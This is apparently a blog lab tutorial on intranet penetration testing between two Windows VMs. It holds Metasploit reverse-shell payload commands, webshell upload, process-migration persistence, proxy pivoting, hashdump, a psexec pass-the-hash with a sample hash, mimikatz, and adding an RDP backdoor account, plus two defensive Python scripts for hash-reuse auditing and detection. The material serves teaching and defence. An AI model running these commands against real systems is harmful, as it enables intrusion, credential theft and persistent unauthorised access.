Intranet penetration testing: a small demo of the pass-the-hash attack

Environment construction

Win Server 2003

Set account password

Right-click My Computer, select Manage, open Local Users and Groups, and reset the admin account's password to 123456 to make the later steps easier

In VMware, add a network adapter to the virtual machine and set its network connection to a LAN segment

After powering on, set the IP address manually to


Win Server 2008

Set the virtual machine's network connection to the LAN segment and, after startup, set the IP address manually to

Note: the network connections of the two virtual machines can use either a LAN segment or host-only mode; the exact configuration is up to you

Getting a shell

It is known that Win Server 2003 has a file upload vulnerability, which has already been used to get a webshell

Generate the backdoor file with MSF

Generate the backdoor file in Kali

msfvenom  -p windows/meterpreter/reverse_tcp lhost=  lport=12345 -f exe >/var/www/html/s.exe

After generation, upload the file to the Win Server through the webshell

In Kali, enter msf and start the listener

use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp
set lhost
set lport 12345

When the exe file is run on the Win Server, the session comes online

Collect information

  • System information

  • View routing table information

  • View processes

    If that fails, drop into a shell and use tasklist to view them

Inject into a process to maintain access

Usually the session is migrated into the explorer.exe process

migrate 2424

After the migration succeeds, the shell will be started every time the explorer.exe process is started

Collect intranet information

  • View the routing table

    run autoroute -p 
  • Detect live intranet hosts

    # Via the ping command
    run post/multi/gather/ping_sweep RHOSTS=
    # Via the ARP protocol
    run post/windows/gather/arp_scanner RHOSTS=
    # View module information with info
    info post/multi/gather/ping_sweep

  • Scan with nmap through the proxy

    Add the route

    run autoroute -s
    use auxiliary/server/socks4a 
    set SRVPORT 10044

    Edit the proxychains configuration file

    vi /etc/proxychains.conf

    Comment out the original entry and add a new one

    socks4 10044

    With that, the route is in place

    Use nmap to scan, one at a time, the IPs found to be alive in the previous step

    proxychains nmap -sT -Pn --open -oN
    The -oN option saves the results to a file in nmap's normal output format

The port scan shows that port 445 is open, so try to attack it

Pass-the-hash attack

PTH stands for pass the hash. The principle is that an attacker can authenticate directly to a remote host or service using the LM hash and NTLM hash, without needing the plaintext password

Get the hash values with MSF

meterpreter > hashdump 

Select the payload and use the account password hash from Win Server 2003 to attack Win Server 2008. In an intranet, many hosts often share the same password, so once a hash is obtained it can be used to move laterally

use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
show options                      --> view the configuration options
set RHOST                         --> set the target IP; the port defaults to 445
set SMBUser Administrator         --> set the account name
set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4

The attack yields another session

hash decryption website:

The second half of the hash string (after the colon) is the NTLM hash
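The password reuse the paragraph above relies on can be checked directly from hashdump output. The following Python script is an added example (not code from the original post or from Metasploit): it parses pwdump-format hashdump lines, flags accounts whose LM hash is still stored, and reports NT hashes that appear on more than one host, which is what turns a single credential dump into lateral movement. The host names and all hash lines except the Administrator hash already shown on this page are constructed sample data; the empty-password LM and NT hash constants are the well-known standard values.

```python
"""Audit hashdump output for the two conditions this lab depends on: LM hashes
still being stored, and the same local account password (hence the same NT
hash) reused across hosts. Added example, not code from the original post or
from Metasploit. All hash lines below are constructed sample data."""

import re
from collections import defaultdict

# pwdump/hashdump line format: user:RID:LM_hash:NT_hash:::
HASHDUMP_RE = re.compile(
    r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# LM hash of an empty string: stored when NoLMHash is enforced or the
# password is longer than 14 characters, so it means "no LM hash kept".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of an empty password (disabled or never-set accounts).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample dumps from two hosts. The srv2003 Administrator line
# is the hash shown on this page; every other line is made up.
SAMPLE_DUMPS = {
    "srv2003": """\
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
""",
    "srv2008": """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
backupsvc:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
""",
}


def parse_hashdump(text):
    """Return (user, rid, lm, nt) tuples; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = HASHDUMP_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append((user, int(rid), lm.lower(), nt.lower()))
    return entries


def lm_hashes_stored(entries):
    """Names of enabled accounts whose LM hash is populated, i.e. the host does
    not enforce NoLMHash and the password is at most 14 characters."""
    return [user for user, _, lm, nt in entries
            if lm != EMPTY_LM and nt != EMPTY_NT]


def find_reused_nt_hashes(dumps):
    """dumps maps hostname -> hashdump text. Returns {nt_hash: [(host, user), ...]}
    for every NT hash present on more than one host. Equal NT hashes mean equal
    passwords, which is exactly what lets a hash taken from one host authenticate
    to the next."""
    seen = defaultdict(list)
    for host, text in dumps.items():
        for user, _, _, nt in parse_hashdump(text):
            if nt != EMPTY_NT:
                seen[nt].append((host, user))
    return {nt: hits for nt, hits in seen.items()
            if len({host for host, _ in hits}) > 1}


if __name__ == "__main__":
    for host, text in SAMPLE_DUMPS.items():
        print(host, "accounts with LM hash stored:",
              lm_hashes_stored(parse_hashdump(text)))
    for nt, hits in find_reused_nt_hashes(SAMPLE_DUMPS).items():
        print("NT hash", nt, "reused on:", hits)
```

Running the same comparison over dumps taken during a credential audit is how a defender finds the shared local Administrator password before an attacker does; the fix is a unique password per host (for example via LAPS) together with enforcing NoLMHash, which removes the weak LM hash entirely.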


mimikatz can be loaded directly in msf

meterpreter > load mimikatz 
meterpreter > msv
meterpreter > kerberos 

Enable RDP with the command

run  getgui  -e

Add an account

run getgui -u moonsec -p moonsec

Port forwarding

portfwd add -l 5555 -p 3389 -r
rdesktop -u Administrator -p 123qwe
proxychains rdesktop -u Administrator -p 123456
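The psexec login above and the account creation in the getgui step each leave a recognisable trace in Windows event logs, and together they form a sequence worth alerting on. The following Python script is an added example (not from the original post): it correlates a 4624 network logon (LogonType 3) authenticated with NTLM with a 7045 service installation on the same host within a short window, and attaches any 4720 account creation that follows. SAMPLE_LOG is a constructed key=value rendering of the relevant event fields, not a real log export; the source IP 10.0.0.5 and the service name RandomSvc are placeholders, while the account name moonsec is the one used on this page.

```python
"""Correlate the host-side traces a psexec-style pass-the-hash login leaves
behind: a 4624 network logon (type 3) authenticated with NTLM, followed within
seconds by a 7045 service installation, and optionally a 4720 local account
creation. Added example, not from the original post. SAMPLE_LOG is a
constructed key=value rendering of the relevant event fields, not a real log
export; the source IP and service name are placeholders."""

from datetime import datetime, timedelta

SAMPLE_LOG = """\
2021-11-26T18:50:01 host=SRV2008 EventID=4624 LogonType=3 AuthPackage=NTLM TargetUser=Administrator IpAddress=10.0.0.5
2021-11-26T18:50:02 host=SRV2008 EventID=7045 ServiceName=RandomSvc ImagePath=%SystemRoot%\\RandomSvc.exe
2021-11-26T18:50:20 host=SRV2008 EventID=4720 TargetUser=moonsec SubjectUser=Administrator
2021-11-26T18:55:00 host=SRV2008 EventID=4624 LogonType=3 AuthPackage=Kerberos TargetUser=backupsvc IpAddress=10.0.0.9
2021-11-26T18:55:30 host=SRV2008 EventID=4624 LogonType=2 AuthPackage=NTLM TargetUser=Administrator IpAddress=-
"""


def parse_events(text):
    """Turn each 'timestamp key=value ...' line into a dict with a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        ev = {"time": datetime.fromisoformat(ts)}
        for field in fields:
            key, _, value = field.partition("=")
            ev[key] = value
        events.append(ev)
    return events


def is_ntlm_network_logon(ev):
    """4624 with LogonType 3 and NTLM: the shape an SMB logon with a passed
    hash takes (a Kerberos ticket would show AuthPackage=Kerberos)."""
    return (ev.get("EventID") == "4624" and ev.get("LogonType") == "3"
            and ev.get("AuthPackage") == "NTLM")


def detect_pth_lateral_movement(text, window=timedelta(seconds=60)):
    """Return one alert per NTLM network logon that is followed on the same
    host, within `window`, by a service installation (7045). Account creations
    (4720) inside the same window are attached to the alert."""
    events = sorted(parse_events(text), key=lambda e: e["time"])
    alerts = []
    for i, ev in enumerate(events):
        if not is_ntlm_network_logon(ev):
            continue
        later = [e for e in events[i + 1:]
                 if e.get("host") == ev.get("host")
                 and e["time"] - ev["time"] <= window]
        service = next((e for e in later if e.get("EventID") == "7045"), None)
        if service is None:
            continue   # a lone NTLM network logon is routine; no alert
        alerts.append({
            "host": ev.get("host"),
            "user": ev.get("TargetUser"),
            "source": ev.get("IpAddress"),
            "service": service.get("ServiceName"),
            "new_accounts": [e.get("TargetUser") for e in later
                             if e.get("EventID") == "4720"],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_pth_lateral_movement(SAMPLE_LOG):
        print("possible pass-the-hash lateral movement:", alert)
```

A 4624/NTLM network logon on its own is far too common to alert on; pairing it with a service installation within a minute is what makes the sequence specific to psexec-style execution. In a full event record the same logon also shows LogonProcessName NtLmSsp and KeyLength 0, which can be used as additional filters, and restricting which accounts may log on over the network to servers removes the root cause the lab exploits.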

Recommended reading

Research on horizontal mobility hash delivery attack of Intranet penetration

Introduction to the principle of passing hash attack

Tags: Linux bash Cyber Security

Posted on Fri, 26 Nov 2021 18:50:56 -0500 by kbc1